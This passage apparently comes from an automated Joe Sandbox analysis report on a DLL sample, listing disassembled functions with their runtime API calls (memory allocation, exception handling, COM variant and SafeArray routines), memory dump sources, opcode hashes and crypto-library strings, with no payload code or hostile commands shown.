                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 3005353045-0
                                            • Opcode ID: f4b66f260cbe70c22ee030345da939cb9c4acb86dec41f9def7457dbac4ec9e4
                                            • Instruction ID: 7e636236e09c4535d4d16f7bd62c4a03d3c6c47fdf8c785dde3ba1c4eb5abfd6
                                            • Opcode Fuzzy Hash: f4b66f260cbe70c22ee030345da939cb9c4acb86dec41f9def7457dbac4ec9e4
                                            • Instruction Fuzzy Hash: EE317C72A01744AFC714CFA8C480A9AFBF8FF08214F508A6EE85687B41D770FA44CB90
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 6CEBDCC5
                                              • Part of subcall function 6CEF9533: std::exception::_Copy_str.LIBCMT ref: 6CEF954E
                                            • __CxxThrowException@8.LIBCMT ref: 6CEBDCDA
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                              • Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF
                                            • std::exception::exception.LIBCMT ref: 6CEBDD09
                                            • __CxxThrowException@8.LIBCMT ref: 6CEBDD1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                            • String ID:
                                            • API String ID: 399550787-0
                                            • Opcode ID: 7748be59e3a16451bee9d2a5bcb08ed867ee7566871fb5a09d41d67ea0412c05
                                            • Instruction ID: 8c203918e7128e9d328c9344ed2c148edecebc0938002b1f94a85cee29c87178
                                            • Opcode Fuzzy Hash: 7748be59e3a16451bee9d2a5bcb08ed867ee7566871fb5a09d41d67ea0412c05
                                            • Instruction Fuzzy Hash: 26314FB69042099FD704CF99D841AAEBBF8FF48314F5085ADE91997750D770EA04CBA1
                                            APIs
                                            • _malloc.LIBCMT ref: 6CF02653
                                              • Part of subcall function 6CEF9D66: __FF_MSGBANNER.LIBCMT ref: 6CEF9D7F
                                              • Part of subcall function 6CEF9D66: __NMSG_WRITE.LIBCMT ref: 6CEF9D86
                                              • Part of subcall function 6CEF9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEF9DAB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AllocateHeap_malloc
                                            • String ID:
                                            • API String ID: 501242067-0
                                            • Opcode ID: c612b35f7be9d7a28db27d500401de2c8dea69bf111ff574d0c6d96f98cdbfec
                                            • Instruction ID: dce23d27a28960c11fbb4e51727dc038c981a6e623a6814440c9391b497dcd7f
                                            • Opcode Fuzzy Hash: c612b35f7be9d7a28db27d500401de2c8dea69bf111ff574d0c6d96f98cdbfec
                                            • Instruction Fuzzy Hash: 15112B33B05214ABCF211F35A81878E3BB5AB42B79F35012DE4549BF80DB328941A7B4
                                            APIs
                                              • Part of subcall function 6CEC4410: _malloc.LIBCMT ref: 6CEC446E
                                            • SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6CEA7287
                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6CEA729B
                                            • _memmove.LIBCMT ref: 6CEA72AF
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEA72B8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
                                            • String ID:
                                            • API String ID: 583974297-0
                                            • Opcode ID: ffc99a42e02a79b885be3e88be26f767c287468f64c0b2bd0841ef5ff70e5b41
                                            • Instruction ID: a76a6d07861a349ffdecef26e1ab6bc332801231c1617fee1e085b8403038051
                                            • Opcode Fuzzy Hash: ffc99a42e02a79b885be3e88be26f767c287468f64c0b2bd0841ef5ff70e5b41
                                            • Instruction Fuzzy Hash: 9D1193B2A10118BBCB00CFD5D840DDFBB7DDFC9654B118269F904AB600D6709A0587E0
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6CEB5AB9
                                            • VariantCopy.OLEAUT32(?,6CF29C90), ref: 6CEB5AC1
                                            • VariantClear.OLEAUT32(?), ref: 6CEB5AE2
                                            • __CxxThrowException@8.LIBCMT ref: 6CEB5AEF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCopyException@8InitThrow
                                            • String ID:
                                            • API String ID: 3826472263-0
                                            • Opcode ID: 5ec465ce41d072ec79f99f24fe99df8d3059e0aca39df38eeab23a8d8b34c07a
                                            • Instruction ID: b56b6bd6e42568854e11bd94815a4a40d71788854fc7acc45e88cb3f33726a54
                                            • Opcode Fuzzy Hash: 5ec465ce41d072ec79f99f24fe99df8d3059e0aca39df38eeab23a8d8b34c07a
                                            • Instruction Fuzzy Hash: 9A11E972D05258AFCB11DF98C9C4AEFBB78EB46628F31422AE824B7B00C7745D0487E1
                                            APIs
                                            • _malloc.LIBCMT ref: 6CEC8D8A
                                              • Part of subcall function 6CEF9D66: __FF_MSGBANNER.LIBCMT ref: 6CEF9D7F
                                              • Part of subcall function 6CEF9D66: __NMSG_WRITE.LIBCMT ref: 6CEF9D86
                                              • Part of subcall function 6CEF9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CEF9BD4,6CE91290,67D4BDE6), ref: 6CEF9DAB
                                              • Part of subcall function 6CEF91F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CEF9202
                                            • _malloc.LIBCMT ref: 6CEC8DAF
                                            • std::exception::exception.LIBCMT ref: 6CEC8DD4
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC8DEB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                            • String ID:
                                            • API String ID: 3043633502-0
                                            • Opcode ID: 5c415089a3dec5c2ee182f0bc1953cb4c00f30a406642cfe562cc8d59709e529
                                            • Instruction ID: b1aa5a5bf409b84e87e0c36dd23403c963deeecc38eaf597215c3f1d06197df6
                                            • Opcode Fuzzy Hash: 5c415089a3dec5c2ee182f0bc1953cb4c00f30a406642cfe562cc8d59709e529
                                            • Instruction Fuzzy Hash: E5F0CD7290421127D310EF559E51BEF3ABC9F91618F60082DF8A492B00EB25960E86B3
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                            • Instruction ID: 14b3bb4766f209240e65b3b9249a88a2b74cabdcbb1b6596e0aa1b0ca7c21370
                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                            • Instruction Fuzzy Hash: 5A117E3310018ABBCF165E84DC22CDE3F22BB19758B598515FE2859530C376C6B1BB81
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _memmove_memset
                                            • String ID: EncodingParameters
                                            • API String ID: 3555123492-55378216
                                            • Opcode ID: 76b4cd565bda1ef09e5b4562de235afcc81a4d218ffaf473de44a8cf6679ea8a
                                            • Instruction ID: 51822a327266fcfdd02883c604866482697b0365b50f4b09dd45ae1679ad5d47
                                            • Opcode Fuzzy Hash: 76b4cd565bda1ef09e5b4562de235afcc81a4d218ffaf473de44a8cf6679ea8a
                                            • Instruction Fuzzy Hash: E36102B42083419FC344CF69C880A1AFBE9AFC9754F148A1EF59987391D770E945CBA2
                                            APIs
                                              • Part of subcall function 6CE94760: __CxxThrowException@8.LIBCMT ref: 6CE947F9
                                              • Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8D8A
                                              • Part of subcall function 6CEC8D80: _malloc.LIBCMT ref: 6CEC8DAF
                                            • _memcpy_s.LIBCMT ref: 6CE9F282
                                            • _memset.LIBCMT ref: 6CE9F293
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                            • String ID: @
                                            • API String ID: 3081897325-2766056989
                                            • Opcode ID: 9231aceb7923f59ed869d409939e40a7a923d5865e9989fbb150ba3a49471cc6
                                            • Instruction ID: 89c2e8219f98124c7707c5a3d19a1a38389e0b94e1ae08005b8bd121ff5d64e2
                                            • Opcode Fuzzy Hash: 9231aceb7923f59ed869d409939e40a7a923d5865e9989fbb150ba3a49471cc6
                                            • Instruction Fuzzy Hash: D351BE71900248DFDB20CFA4C981BDEBBB4BF45308F20819DE85967781DB756A49CF92
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 6CE94175
                                            • _memmove.LIBCMT ref: 6CE941C6
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: string too long
                                            • API String ID: 2168136238-2556327735
                                            • Opcode ID: 122cc310d183683d061edb53f32501ac7ceb8e07ce8c30f22deec2da834e0756
                                            • Instruction ID: c6a2cfc67be6886dc1586c9d4f20f729de230060eefa4dcd3f4cf46024e23e45
                                            • Opcode Fuzzy Hash: 122cc310d183683d061edb53f32501ac7ceb8e07ce8c30f22deec2da834e0756
                                            • Instruction Fuzzy Hash: 1A31B3333156105BD3249E5DEC80A5AF7F9EBA6768B300A2FE4A1CBF40C7619C4497A2
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 6CECC39B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: gfff$gfff
                                            • API String ID: 2005118841-3084402119
                                            • Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                            • Instruction ID: b30214515156b9d4762adb68db9ff9a9f596ca3f68d1d57635ff2332935f28c1
                                            • Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                            • Instruction Fuzzy Hash: 12314371A0420DAFD714CF98D980EEEB779FB84718F54811CE92597784D730BA09CB92
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CE9194F
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • std::exception::exception.LIBCMT ref: 6CE9198E
                                              • Part of subcall function 6CEF95C1: std::exception::operator=.LIBCMT ref: 6CEF95DA
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
                                              • Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8
                                            Strings
                                            • Clone() is not implemented yet., xrefs: 6CE918ED
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                            • String ID: Clone() is not implemented yet.
                                            • API String ID: 2192554526-226299721
                                            • Opcode ID: df01af26b834f52c0907929de4cacfcb640a416a04802cca0ded7097aff29a6f
                                            • Instruction ID: c5739f8f995e16d0ed35005e30c55d5faacc994f4b3633da103cc9ed51512461
                                            • Opcode Fuzzy Hash: df01af26b834f52c0907929de4cacfcb640a416a04802cca0ded7097aff29a6f
                                            • Instruction Fuzzy Hash: AD3162B1C04248AFCB14CF98D840BEEFBB8FB09714F20462EE421A7B90D7759608CB90
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CEC5657
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            Strings
                                            • InputBuffer, xrefs: 6CEC55BF
                                            • StringStore: missing InputBuffer argument, xrefs: 6CEC55E0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
                                            • Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                            • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                            • API String ID: 3718517217-2380213735
                                            • Opcode ID: b49e5b1e8c176cd07d035340b20f436806dd76f8021af583cf91aa54ed517d03
                                            • Instruction ID: fdee1713448a0f5df6661970b479d3d2964ebef23df14a86e2eb2b343bdb1032
                                            • Opcode Fuzzy Hash: b49e5b1e8c176cd07d035340b20f436806dd76f8021af583cf91aa54ed517d03
                                            • Instruction Fuzzy Hash: D14127B16083809FC320CF19C590A9BFBF4BB99718F548A1EF5E987790DB759908CB52
                                            APIs
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A
                                            • __CxxThrowException@8.LIBCMT ref: 6CE91F36
                                              • Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7
                                            • std::exception::exception.LIBCMT ref: 6CE91F6E
                                              • Part of subcall function 6CEF95C1: std::exception::operator=.LIBCMT ref: 6CEF95DA
                                              • Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
                                              • Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8
                                            Strings
                                            • CryptoMaterial: this object does not support precomputation, xrefs: 6CE91ED4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true
